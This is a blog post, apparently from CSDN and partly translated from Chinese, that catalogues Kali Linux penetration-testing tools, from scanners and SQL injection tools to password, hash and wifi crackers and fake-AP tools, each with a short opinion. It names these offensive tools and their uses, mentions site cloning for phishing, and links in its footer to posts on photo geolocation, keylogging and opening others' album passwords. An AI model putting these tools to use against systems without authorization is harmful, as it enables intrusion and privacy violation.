Penetration testing refers to the use of various means by penetration personnel in different locations (such as from the internal network, from the external network, etc.).
A specific network is tested in order to discover and excavate the vulnerabilities existing in the system, and then output a penetration test report,
and submitted to the network owner. Based on the penetration test report provided by the infiltrator, the network owner,
You can clearly know the security risks and problems existing in the system.
Therefore, today I will introduce some commonly used penetration testing tools and how to use them:
It is recommended to collect and practice slowly.
dmitry |
collect message |
whois query/subdomain collection/port scan |
whois is not straightforward; subdomains and mailboxes rely on google; port scanning speed is average |
|
dnmap |
collect message |
Used to form distributed nmap, dnmap_server is the server; dnmap_client is the client |
It's not so convenient to use, it's not really impossible, it's not necessary |
|
ike-scan |
collect message |
Collect ipsec vpn server fingerprint information |
It seems to be used to attack vpn, I don't understand |
|
maltegoce |
collect message |
gui |
Domain name/account and other correlation collection and display |
The correlation display function is really good, but the effect may not be so ideal, especially for domestic |
netdiscover |
collect message |
Actively issue arp packets and intercept arp packets |
As far as arp detection is concerned, the function itself does a good job |
|
nmap |
collect message |
cmd-line |
Port service detection and port vulnerability scanning |
Port scan master |
p0f |
collect message |
cmd-line |
Monitor the data packets sent and received by the network card, and read information such as the operating system version of the remote machine from the data packets |
After all, it is only to intercept the version information in the data package, and the effect is not expected to be great. |
regon-ng |
collect message |
shell |
Information detection framework imitating msf |
Similar to the command line of webmaster tools and other things, the idea is good, but it does not feel so intuitive to use |
sparta |
Brute force |
gui |
Graphical version of hydra, with port service scanning added |
Ok GUI is better than nothing |
zenmap |
collect message |
gui |
GUI version of nmap |
Ok GUI is better than nothing |
golismero |
web scan |
cmd-line |
It is a text version of a web scanner similar to awvs |
Feels like a better understanding of how scanners work |
lynis |
system audit |
It feels a bit like the "immediate experience" of the 360 homepage, but just scanning the alarm cannot be repaired with one click |
It's fun to write shell scripts |
|
nobody |
web scan |
web scanner |
I like this kind of scanner that reports vulnerabilities directly (but in fact there are very few usable vulnerabilities) |
|
unix-watch-check |
system audit |
Check whether the key file permissions in the audit system are abnormal |
Still no summary display and repair function |
|
bed |
system scan |
Tool to test buffer overflow vulnerabilities of multiple services by sending various fuzzed data |
probably not bad |
|
burpsuite |
web proxy |
Common web proxy packet interception tool |
Powerful can't ask for more |
|
mingling |
Injection detection |
sqlmap detects sql injection This tool detects system command injection |
The two-phase combination basically covers the injection. |
|
httrack |
website clone |
Clone the website locally |
fishing dark clouds etc may be useful |
|
owasp-zap |
web proxy |
gui |
Tools developed by the owasp organization |
Compared with burpsuite, it weakens the packet interception function and strengthens the web vulnerability scanning function, but I don't feel that anything has been swept out. |
paros |
web scan |
gui |
A web crawling and leak scanning tool |
Similar to owasp-zap |
skipfish |
web scan |
cmd-line |
A fully automated web vulnerability scanning tool |
Its job is to crawl the website pages, then analyze the page vulnerabilities, and finally generate an html report |
sqlmap |
sql injection scan |
cmd-line |
A powerful sql injection scanning tool |
|
w3af |
web scan |
shell/gui |
A web vulnerability scanning framework |
The so-called framework is a bunch of scanning modules, and then you select some of them to scan the website; it doesn't feel as good as it sounds. |
webscarab |
http proxy |
gui |
More professional website tree structure analysis tool |
|
wpscan |
web scan |
Vulnerability scanner for wordpress |
||
bbqsql |
blind scan |
shell |
A highly configurable interactive blind SQL injection tool |
|
hexorbase |
database management |
gui |
A client that supports multiple databases has password cracking capabilities for multiple databases |
It can only be used as a client. To break the password, you need to prepare your own dictionary |
jsql |
Database Probing |
gui |
Detect database type based on url/parameter injection test/detect background page and/detect important files |
|
mdb-sql |
database management |
cmd-line |
Can be used to connect to the access database file (mdb) and then query data through sql statements |
|
oscan |
database guess |
cmd-line |
Use the dictionary to check whether the oracle database is listening and guess the service name |
There are few parameters. It is possible to test sid and default user, but the default dictionary is basically unreadable or you have to write your own dictionary |
sidguesser |
database guess |
cmd-line |
Use dictionary to detect sid existing in oracle database |
参数很少。测试验证如果字典里有sid,可以探测出sid。基于字典的工具还是得自己准备字典 |
sqllite database |
数据库管理 |
gui |
sqlite数据库客户端 |
|
sqlinja |
数据库猜解 |
cmd-line |
用于猜解ms sql |
|
sqlsus |
sql注入检测 |
cmd-line |
用于mysql的盲注检测 |
|
tnscmd10g |
数据库探测 |
cmd-line |
用于探测oracle是否监听及其他一些信息 |
|
cewl |
口令文件制作 |
cmd-line |
爬取给定的URL并依据限制条件截取网页中的单词生成口令集合 |
这种想法是可取的。但有点遗憾只是截取网页中的单词,没有a转@等等智能变换 |
crunch |
口令文件制作 |
cmd-line |
依据限定的条件生成口令集合 |
|
hashcat |
hash爆破 |
cmd-line |
多种hash的爆力猜解工具,速度快所耗CPU小(相对) |
|
john |
系统口令破解 |
cmd-line |
用于对系统口令文件的破解(如/etc/passwd)还原出密码明文 |
|
johnny |
系统口令破解 |
gui |
john的gui版本 |
|
medusa |
口令猜解 |
cmd-line |
可对IMAP, rlogin, SSH等进行口令猜解,类似hydra |
|
ncrack |
口令猜解 |
cmd-line |
可对IMAP, rlogin, SSH等进行口令猜解,类似hydra |
|
ophcrack |
系统口令破解 |
gui |
基于彩虹表的windows口令破解工具 |
|
pyrit |
wifi破解 |
cmd-line |
WPA/WPA2加密的wifi的密码破解工具 |
|
rainbowcrack |
hash破解 |
cmd-line |
具有彩虹表的生成、排序和使用排序好换彩虹表进行破解的功能 |
|
rcracki_mt |
hash破解 |
cmd-line |
基于彩虹表的hash破解工具,可能蚲rainbowcrack一部份 |
|
wordlist |
口令文件 |
cmd-line |
打印kali自带的一些口令文件存放的位置 |
|
aircrack-ng |
wifi破解 |
cmd-line |
针对WEP、 WPA加密方式的wifi密码破解套件 |
|
chirp |
无线电拦截 |
gui |
各种无线电数据包的拦截工具(?) |
|
cowpatty |
wifi破解 |
cmd-line |
基于已捕获握手包和密码字典的WPA-PSK加密的wifi密码的猜解 |
不能自己拦截数据包也只能破解WPA-PSK类加密方式功能有点弱 |
Fern WIFI Cracker |
wifi破解 |
gui |
基于字典的WEP和WPA加密的wifi破解工具 |
能自动发现wifi能拦截数据包,图形界面操作,简单易用 |
Ghost Phiser |
AP假冒 |
gui |
能发现AP并使与AP连接的设备断开连接然后假冒AP让设备重新连接 |
图形界面除了AP外还有假冒DNS、http服务器等,较为好用 |
giskismet |
可视化 |
gui |
Kismet输出结果的可视化工具,即较成text、html等各种格式 |
|
kismet |
AP发现 |
shell |
交互式的AP发现工具,列出周围AP的各种信息 |
|
MDK3 |
AP扰乱 |
cmd-line |
可向AP发送大量连接、断开请求,可向周围设备告知存在根本不存在的大量AP |
这工具的攻击方法简直是发了疯 |
推荐阅读
优质资源
- Java实现照片GPS定位【完整脚本】
- ReadPicExif.zip_-Java文档类资源-CSDN下载https://download.csdn.net/download/weixin_42350212/20024262
- Python实现照片GPS定位【完整脚本】
- python定位照片精确位置完整代码脚本_Python手机号定位-Python文档类资源-CSDN下载https://download.csdn.net/download/weixin_42350212/19776215
- 女神忘记相册密码 python20行代码打开【完整脚本】
- 女神忘记相册密码python20行代码打开.py_-Python文档类资源-CSDN下载https://download.csdn.net/download/weixin_42350212/19871942
- python修改证件照底色、大小、背景、抠图【完整源码】https://download.csdn.net/download/weixin_42350212/19815306
- python修改证件照底色、大小、背景、抠图【完整源码】_-Python文档类资源-CSDN下载https://download.csdn.net/download/weixin_42350212/19815306
python实战
- 【python实战https://blog.csdn.net/weixin_42350212/article/details/117031929
- 【python实战】前女友发来加密的 “520快乐.pdf“,我用python破解开之后,却发现https://blog.csdn.net/weixin_42350212/article/details/117031929
- 【python实战】昨晚,我用python帮隔壁小姐姐P证件照 自拍,然后发现https://blog.csdn.net/weixin_42350212/article/details/116936268...
- 【python实战】python你TM太皮了——区区30行代码就能记录键盘的一举一动https://blog.csdn.net/weixin_42350212/article/details/115399658
- 【python实战】女神相册密码忘记了,我只用Python写了20行代码~~~https://blog.csdn.net/weixin_42350212/article/details/115580004